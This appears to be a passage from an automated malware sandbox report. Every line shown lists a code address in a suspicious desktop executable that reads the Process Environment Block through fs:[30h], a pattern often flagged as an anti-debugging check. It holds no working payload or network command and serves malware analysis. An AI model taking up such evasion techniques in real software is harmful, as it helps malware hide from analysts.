            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E10E mov eax, dword ptr fs:[00000030h]4_2_0168E10E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E10E mov ecx, dword ptr fs:[00000030h]4_2_0168E10E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168A118 mov ecx, dword ptr fs:[00000030h]4_2_0168A118
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168A118 mov eax, dword ptr fs:[00000030h]4_2_0168A118
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168A118 mov eax, dword ptr fs:[00000030h]4_2_0168A118
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168A118 mov eax, dword ptr fs:[00000030h]4_2_0168A118
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A0115 mov eax, dword ptr fs:[00000030h]4_2_016A0115
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B61E5 mov eax, dword ptr fs:[00000030h]4_2_016B61E5
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016101F8 mov eax, dword ptr fs:[00000030h]4_2_016101F8
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A61C3 mov eax, dword ptr fs:[00000030h]4_2_016A61C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A61C3 mov eax, dword ptr fs:[00000030h]4_2_016A61C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E1D0 mov eax, dword ptr fs:[00000030h]4_2_0165E1D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E1D0 mov eax, dword ptr fs:[00000030h]4_2_0165E1D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0165E1D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E1D0 mov eax, dword ptr fs:[00000030h]4_2_0165E1D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E1D0 mov eax, dword ptr fs:[00000030h]4_2_0165E1D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DA197 mov eax, dword ptr fs:[00000030h]4_2_015DA197
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DA197 mov eax, dword ptr fs:[00000030h]4_2_015DA197
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DA197 mov eax, dword ptr fs:[00000030h]4_2_015DA197
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169C188 mov eax, dword ptr fs:[00000030h]4_2_0169C188
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169C188 mov eax, dword ptr fs:[00000030h]4_2_0169C188
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01620185 mov eax, dword ptr fs:[00000030h]4_2_01620185
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01684180 mov eax, dword ptr fs:[00000030h]4_2_01684180
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01684180 mov eax, dword ptr fs:[00000030h]4_2_01684180
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166019F mov eax, dword ptr fs:[00000030h]4_2_0166019F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166019F mov eax, dword ptr fs:[00000030h]4_2_0166019F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166019F mov eax, dword ptr fs:[00000030h]4_2_0166019F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166019F mov eax, dword ptr fs:[00000030h]4_2_0166019F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E2050 mov eax, dword ptr fs:[00000030h]4_2_015E2050
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160C073 mov eax, dword ptr fs:[00000030h]4_2_0160C073
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666050 mov eax, dword ptr fs:[00000030h]4_2_01666050
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FE016 mov eax, dword ptr fs:[00000030h]4_2_015FE016
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FE016 mov eax, dword ptr fs:[00000030h]4_2_015FE016
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FE016 mov eax, dword ptr fs:[00000030h]4_2_015FE016
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FE016 mov eax, dword ptr fs:[00000030h]4_2_015FE016
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01676030 mov eax, dword ptr fs:[00000030h]4_2_01676030
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01664000 mov ecx, dword ptr fs:[00000030h]4_2_01664000
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01682000 mov eax, dword ptr fs:[00000030h]4_2_01682000
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01682000 mov eax, dword ptr fs:[00000030h]4_2_01682000
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01682000 mov eax, dword ptr fs:[00000030h]4_2_01682000
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01682000 mov eax, dword ptr fs:[00000030h]4_2_01682000
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01682000 mov eax, dword ptr fs:[00000030h]4_2_01682000
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01682000 mov eax, dword ptr fs:[00000030h]4_2_01682000
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01682000 mov eax, dword ptr fs:[00000030h]4_2_01682000
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01682000 mov eax, dword ptr fs:[00000030h]4_2_01682000
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DA020 mov eax, dword ptr fs:[00000030h]4_2_015DA020
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DC020 mov eax, dword ptr fs:[00000030h]4_2_015DC020
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016660E0 mov eax, dword ptr fs:[00000030h]4_2_016660E0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016220F0 mov ecx, dword ptr fs:[00000030h]4_2_016220F0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DC0F0 mov eax, dword ptr fs:[00000030h]4_2_015DC0F0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E80E9 mov eax, dword ptr fs:[00000030h]4_2_015E80E9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016620DE mov eax, dword ptr fs:[00000030h]4_2_016620DE
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DA0E3 mov ecx, dword ptr fs:[00000030h]4_2_015DA0E3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016780A8 mov eax, dword ptr fs:[00000030h]4_2_016780A8
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A60B8 mov eax, dword ptr fs:[00000030h]4_2_016A60B8
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A60B8 mov ecx, dword ptr fs:[00000030h]4_2_016A60B8
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E208A mov eax, dword ptr fs:[00000030h]4_2_015E208A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D80A0 mov eax, dword ptr fs:[00000030h]4_2_015D80A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168437C mov eax, dword ptr fs:[00000030h]4_2_0168437C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B634F mov eax, dword ptr fs:[00000030h]4_2_016B634F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]4_2_01662349
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AA352 mov eax, dword ptr fs:[00000030h]4_2_016AA352
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01688350 mov ecx, dword ptr fs:[00000030h]4_2_01688350
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166035C mov eax, dword ptr fs:[00000030h]4_2_0166035C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166035C mov eax, dword ptr fs:[00000030h]4_2_0166035C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166035C mov eax, dword ptr fs:[00000030h]4_2_0166035C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166035C mov ecx, dword ptr fs:[00000030h]4_2_0166035C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166035C mov eax, dword ptr fs:[00000030h]4_2_0166035C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166035C mov eax, dword ptr fs:[00000030h]4_2_0166035C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DC310 mov ecx, dword ptr fs:[00000030h]4_2_015DC310
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B8324 mov eax, dword ptr fs:[00000030h]4_2_016B8324
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B8324 mov ecx, dword ptr fs:[00000030h]4_2_016B8324
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B8324 mov eax, dword ptr fs:[00000030h]4_2_016B8324
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B8324 mov eax, dword ptr fs:[00000030h]4_2_016B8324
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A30B mov eax, dword ptr fs:[00000030h]4_2_0161A30B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A30B mov eax, dword ptr fs:[00000030h]4_2_0161A30B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A30B mov eax, dword ptr fs:[00000030h]4_2_0161A30B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01600310 mov ecx, dword ptr fs:[00000030h]4_2_01600310
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E83C0 mov eax, dword ptr fs:[00000030h]4_2_015E83C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E83C0 mov eax, dword ptr fs:[00000030h]4_2_015E83C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E83C0 mov eax, dword ptr fs:[00000030h]4_2_015E83C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E83C0 mov eax, dword ptr fs:[00000030h]4_2_015E83C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA3C0 mov eax, dword ptr fs:[00000030h]4_2_015EA3C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA3C0 mov eax, dword ptr fs:[00000030h]4_2_015EA3C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA3C0 mov eax, dword ptr fs:[00000030h]4_2_015EA3C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA3C0 mov eax, dword ptr fs:[00000030h]4_2_015EA3C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA3C0 mov eax, dword ptr fs:[00000030h]4_2_015EA3C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA3C0 mov eax, dword ptr fs:[00000030h]4_2_015EA3C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016163FF mov eax, dword ptr fs:[00000030h]4_2_016163FF
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169C3CD mov eax, dword ptr fs:[00000030h]4_2_0169C3CD
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016663C0 mov eax, dword ptr fs:[00000030h]4_2_016663C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FE3F0 mov eax, dword ptr fs:[00000030h]4_2_015FE3F0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FE3F0 mov eax, dword ptr fs:[00000030h]4_2_015FE3F0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FE3F0 mov eax, dword ptr fs:[00000030h]4_2_015FE3F0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E3DB mov eax, dword ptr fs:[00000030h]4_2_0168E3DB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E3DB mov eax, dword ptr fs:[00000030h]4_2_0168E3DB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E3DB mov ecx, dword ptr fs:[00000030h]4_2_0168E3DB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E3DB mov eax, dword ptr fs:[00000030h]4_2_0168E3DB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F03E9 mov eax, dword ptr fs:[00000030h]4_2_015F03E9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F03E9 mov eax, dword ptr fs:[00000030h]4_2_015F03E9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F03E9 mov eax, dword ptr fs:[00000030h]4_2_015F03E9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F03E9 mov eax, dword ptr fs:[00000030h]4_2_015F03E9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F03E9 mov eax, dword ptr fs:[00000030h]4_2_015F03E9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F03E9 mov eax, dword ptr fs:[00000030h]4_2_015F03E9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F03E9 mov eax, dword ptr fs:[00000030h]4_2_015F03E9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F03E9 mov eax, dword ptr fs:[00000030h]4_2_015F03E9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016843D4 mov eax, dword ptr fs:[00000030h]4_2_016843D4
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016843D4 mov eax, dword ptr fs:[00000030h]4_2_016843D4
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D8397 mov eax, dword ptr fs:[00000030h]4_2_015D8397
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D8397 mov eax, dword ptr fs:[00000030h]4_2_015D8397
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D8397 mov eax, dword ptr fs:[00000030h]4_2_015D8397
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DE388 mov eax, dword ptr fs:[00000030h]4_2_015DE388
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DE388 mov eax, dword ptr fs:[00000030h]4_2_015DE388
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DE388 mov eax, dword ptr fs:[00000030h]4_2_015DE388
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160438F mov eax, dword ptr fs:[00000030h]4_2_0160438F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160438F mov eax, dword ptr fs:[00000030h]4_2_0160438F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E6259 mov eax, dword ptr fs:[00000030h]4_2_015E6259
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DA250 mov eax, dword ptr fs:[00000030h]4_2_015DA250
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01668243 mov eax, dword ptr fs:[00000030h]4_2_01668243
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01668243 mov ecx, dword ptr fs:[00000030h]4_2_01668243
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D826B mov eax, dword ptr fs:[00000030h]4_2_015D826B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B625D mov eax, dword ptr fs:[00000030h]4_2_016B625D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169A250 mov eax, dword ptr fs:[00000030h]4_2_0169A250
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169A250 mov eax, dword ptr fs:[00000030h]4_2_0169A250
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E4260 mov eax, dword ptr fs:[00000030h]4_2_015E4260
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E4260 mov eax, dword ptr fs:[00000030h]4_2_015E4260
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E4260 mov eax, dword ptr fs:[00000030h]4_2_015E4260
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D823B mov eax, dword ptr fs:[00000030h]4_2_015D823B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA2C3 mov eax, dword ptr fs:[00000030h]4_2_015EA2C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA2C3 mov eax, dword ptr fs:[00000030h]4_2_015EA2C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA2C3 mov eax, dword ptr fs:[00000030h]4_2_015EA2C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA2C3 mov eax, dword ptr fs:[00000030h]4_2_015EA2C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA2C3 mov eax, dword ptr fs:[00000030h]4_2_015EA2C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B62D6 mov eax, dword ptr fs:[00000030h]4_2_016B62D6
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F02E1 mov eax, dword ptr fs:[00000030h]4_2_015F02E1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F02E1 mov eax, dword ptr fs:[00000030h]4_2_015F02E1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F02E1 mov eax, dword ptr fs:[00000030h]4_2_015F02E1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016762A0 mov eax, dword ptr fs:[00000030h]4_2_016762A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016762A0 mov ecx, dword ptr fs:[00000030h]4_2_016762A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016762A0 mov eax, dword ptr fs:[00000030h]4_2_016762A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016762A0 mov eax, dword ptr fs:[00000030h]4_2_016762A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016762A0 mov eax, dword ptr fs:[00000030h]4_2_016762A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016762A0 mov eax, dword ptr fs:[00000030h]4_2_016762A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01660283 mov eax, dword ptr fs:[00000030h]4_2_01660283
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01660283 mov eax, dword ptr fs:[00000030h]4_2_01660283
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01660283 mov eax, dword ptr fs:[00000030h]4_2_01660283
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E284 mov eax, dword ptr fs:[00000030h]4_2_0161E284
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E284 mov eax, dword ptr fs:[00000030h]4_2_0161E284
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F02A0 mov eax, dword ptr fs:[00000030h]4_2_015F02A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F02A0 mov eax, dword ptr fs:[00000030h]4_2_015F02A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161656A mov eax, dword ptr fs:[00000030h]4_2_0161656A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161656A mov eax, dword ptr fs:[00000030h]4_2_0161656A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161656A mov eax, dword ptr fs:[00000030h]4_2_0161656A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E8550 mov eax, dword ptr fs:[00000030h]4_2_015E8550
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E8550 mov eax, dword ptr fs:[00000030h]4_2_015E8550
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E53E mov eax, dword ptr fs:[00000030h]4_2_0160E53E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E53E mov eax, dword ptr fs:[00000030h]4_2_0160E53E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E53E mov eax, dword ptr fs:[00000030h]4_2_0160E53E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E53E mov eax, dword ptr fs:[00000030h]4_2_0160E53E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E53E mov eax, dword ptr fs:[00000030h]4_2_0160E53E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01676500 mov eax, dword ptr fs:[00000030h]4_2_01676500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0535 mov eax, dword ptr fs:[00000030h]4_2_015F0535
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0535 mov eax, dword ptr fs:[00000030h]4_2_015F0535
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0535 mov eax, dword ptr fs:[00000030h]4_2_015F0535
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0535 mov eax, dword ptr fs:[00000030h]4_2_015F0535
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0535 mov eax, dword ptr fs:[00000030h]4_2_015F0535
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0535 mov eax, dword ptr fs:[00000030h]4_2_015F0535
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
